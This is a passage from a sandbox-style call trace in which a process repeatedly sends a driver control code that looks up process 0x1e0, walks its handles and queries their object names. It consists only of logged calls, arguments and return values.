lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0244.274] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.274] PsAcquireProcessExitSynchronization () returned 0x0 [0244.274] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880053c85d0) [0244.275] ObReferenceObjectByHandle (in: Handle=0x354, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80036bebb0, HandleInformation=0x0) returned 0x0 [0244.275] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.275] PsReleaseProcessExitSynchronization () returned 0x2 [0244.275] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe0 [0244.275] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.275] ObfDereferenceObject (Object=0xfffffa80036bebb0) returned 0x1 [0244.275] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.275] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.275] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.275] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x38, lpOverlapped=0x0) returned 1 [0244.275] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.275] PsAcquireProcessExitSynchronization () returned 0x0 [0244.275] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880053c85d0) [0244.275] ObReferenceObjectByHandle (in: Handle=0x358, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80036be910, HandleInformation=0x0) returned 0x0 [0244.275] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.275] PsReleaseProcessExitSynchronization () returned 0x2 [0244.275] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe0 [0244.275] ObQueryNameString (in: Object=0xfffffa80036be910, ObjectNameInfo=0xfffffa8003122044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003122044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.275] ObfDereferenceObject (Object=0xfffffa80036be910) returned 0x1 [0244.275] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.275] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.275] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.275] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x38, lpOverlapped=0x0) returned 1 [0244.275] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.276] PsAcquireProcessExitSynchronization () returned 0x0 [0244.276] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880053c85d0) [0244.276] ObReferenceObjectByHandle (in: Handle=0x360, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80036bcb20, HandleInformation=0x0) returned 0x0 [0244.276] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.276] PsReleaseProcessExitSynchronization () returned 0x2 [0244.276] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe0 [0244.276] ObQueryNameString (in: Object=0xfffffa80036bcb20, ObjectNameInfo=0xfffffa800315b044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800315b044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.276] ObfDereferenceObject (Object=0xfffffa80036bcb20) returned 0x1 [0244.276] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.276] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.276] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.276] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0244.276] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.276] PsAcquireProcessExitSynchronization () returned 0x0 [0244.276] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880053c85d0) [0244.276] ObReferenceObjectByHandle (in: Handle=0x390, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80036a68e0, HandleInformation=0x0) returned 0x0 [0244.276] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.276] PsReleaseProcessExitSynchronization () returned 0x2 [0244.276] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe0 [0244.276] ObQueryNameString (in: Object=0xfffffa80036a68e0, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.276] ObfDereferenceObject (Object=0xfffffa80036a68e0) returned 0x1 [0244.276] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.276] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.276] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.276] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x50, lpOverlapped=0x0) returned 1 [0244.276] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.277] PsAcquireProcessExitSynchronization () returned 0x0 [0244.277] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880053c85d0) [0244.277] ObReferenceObjectByHandle (in: Handle=0x3c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80036a08d0, HandleInformation=0x0) returned 0x0 [0244.277] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.277] PsReleaseProcessExitSynchronization () returned 0x2 [0244.277] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe0 [0244.277] ObQueryNameString (in: Object=0xfffffa80036a08d0, ObjectNameInfo=0xfffffa800310c044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800310c044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.277] ObfDereferenceObject (Object=0xfffffa80036a08d0) returned 0x1 [0244.277] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.277] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.277] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.277] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x50, lpOverlapped=0x0) returned 1 [0244.277] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.277] PsAcquireProcessExitSynchronization () returned 0x0 [0244.277] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880053c85d0) [0244.277] ObReferenceObjectByHandle (in: Handle=0x3c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80036a1a50, HandleInformation=0x0) returned 0x0 [0244.277] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.277] PsReleaseProcessExitSynchronization () returned 0x2 [0244.277] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe0 [0244.278] ObQueryNameString (in: Object=0xfffffa80036a1a50, ObjectNameInfo=0xfffffa800312e044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312e044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.278] ObfDereferenceObject (Object=0xfffffa80036a1a50) returned 0x2 [0244.278] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.278] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.278] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.278] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x50, lpOverlapped=0x0) returned 1 [0244.278] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.278] PsAcquireProcessExitSynchronization () returned 0x0 [0244.278] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880053c85d0) [0244.371] ObReferenceObjectByHandle (in: Handle=0x3c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80036a1900, HandleInformation=0x0) returned 0x0 [0244.371] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.371] PsReleaseProcessExitSynchronization () returned 0x2 [0244.371] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe0 [0244.371] ObQueryNameString (in: Object=0xfffffa80036a1900, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.371] ObfDereferenceObject (Object=0xfffffa80036a1900) returned 0x1 [0244.371] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.371] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.371] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.371] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x38, lpOverlapped=0x0) returned 1 [0244.371] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.371] PsAcquireProcessExitSynchronization () returned 0x0 [0244.371] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880053c85d0) [0244.371] ObReferenceObjectByHandle (in: Handle=0x550, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003674740, HandleInformation=0x0) returned 0x0 [0244.371] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.372] PsReleaseProcessExitSynchronization () returned 0x2 [0244.372] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe0 [0244.372] ObQueryNameString (in: Object=0xfffffa8003674740, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.372] ObfDereferenceObject (Object=0xfffffa8003674740) returned 0x1 [0244.372] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.372] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.372] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.372] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0244.372] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.372] PsAcquireProcessExitSynchronization () returned 0x0 [0244.372] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880053c85d0) [0244.373] ObReferenceObjectByHandle (in: Handle=0x5a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003903b30, HandleInformation=0x0) returned 0x0 [0244.373] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.373] PsReleaseProcessExitSynchronization () returned 0x2 [0244.373] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe0 [0244.373] ObQueryNameString (in: Object=0xfffffa8003903b30, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.373] ObfDereferenceObject (Object=0xfffffa8003903b30) returned 0x1 [0244.373] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.373] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.373] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.373] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0244.373] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.373] PsAcquireProcessExitSynchronization () returned 0x0 [0244.373] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880053c85d0) [0244.373] ObReferenceObjectByHandle (in: Handle=0x5b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003795a20, HandleInformation=0x0) returned 0x0 [0244.373] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.373] PsReleaseProcessExitSynchronization () returned 0x2 [0244.374] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe0 [0244.374] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.374] ObfDereferenceObject (Object=0xfffffa8003795a20) returned 0x1 [0244.374] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.374] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.374] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.374] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xb6, lpOverlapped=0x0) returned 1 [0244.374] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.374] PsAcquireProcessExitSynchronization () returned 0x0 [0244.374] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880053c85d0) [0244.374] ObReferenceObjectByHandle (in: Handle=0x600, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002961550, HandleInformation=0x0) returned 0x0 [0244.374] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.374] PsReleaseProcessExitSynchronization () returned 0x2 [0244.374] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe0 [0244.374] ObQueryNameString (in: Object=0xfffffa8002961550, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.374] ObfDereferenceObject (Object=0xfffffa8002961550) returned 0x2 [0244.374] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.374] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.375] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.375] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xba, lpOverlapped=0x0) returned 1 [0244.375] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.375] PsAcquireProcessExitSynchronization () returned 0x0 [0244.375] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880053c85d0) [0244.375] ObReferenceObjectByHandle (in: Handle=0x608, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800d8fe370, HandleInformation=0x0) returned 0x0 [0244.375] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.375] PsReleaseProcessExitSynchronization () returned 0x2 [0244.375] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe0 [0244.375] ObQueryNameString (in: Object=0xfffffa800d8fe370, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.375] ObfDereferenceObject (Object=0xfffffa800d8fe370) returned 0x2 [0244.375] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.375] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.375] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.375] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x76, lpOverlapped=0x0) returned 1 [0244.375] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.375] PsAcquireProcessExitSynchronization () returned 0x0 [0244.375] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880053c85d0) [0244.375] ObReferenceObjectByHandle (in: Handle=0x738, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003ad1a30, HandleInformation=0x0) returned 0x0 [0244.375] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.375] PsReleaseProcessExitSynchronization () returned 0x2 [0244.375] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe0 [0244.376] ObQueryNameString (in: Object=0xfffffa8003ad1a30, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.376] ObfDereferenceObject (Object=0xfffffa8003ad1a30) returned 0x2 [0244.376] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.376] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.376] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.376] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0244.376] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.376] PsAcquireProcessExitSynchronization () returned 0x0 [0244.376] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880053c85d0) [0244.376] ObReferenceObjectByHandle (in: Handle=0x740, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003acf070, HandleInformation=0x0) returned 0x0 [0244.376] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.376] PsReleaseProcessExitSynchronization () returned 0x2 [0244.376] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe0 [0244.376] ObQueryNameString (in: Object=0xfffffa8003acf070, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.376] ObfDereferenceObject (Object=0xfffffa8003acf070) returned 0x2 [0244.376] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.376] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.376] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.376] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0244.376] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.377] PsAcquireProcessExitSynchronization () returned 0x0 [0244.377] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880053c85d0) [0244.377] ObReferenceObjectByHandle (in: Handle=0x744, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003acf280, HandleInformation=0x0) returned 0x0 [0244.377] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.377] PsReleaseProcessExitSynchronization () returned 0x2 [0244.377] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe0 [0244.377] ObQueryNameString (in: Object=0xfffffa8003acf280, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.377] ObfDereferenceObject (Object=0xfffffa8003acf280) returned 0x2 [0244.377] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.377] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.377] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.377] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0244.377] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.377] PsAcquireProcessExitSynchronization () returned 0x0 [0244.377] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880053c85d0) [0244.377] ObReferenceObjectByHandle (in: Handle=0x74c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, 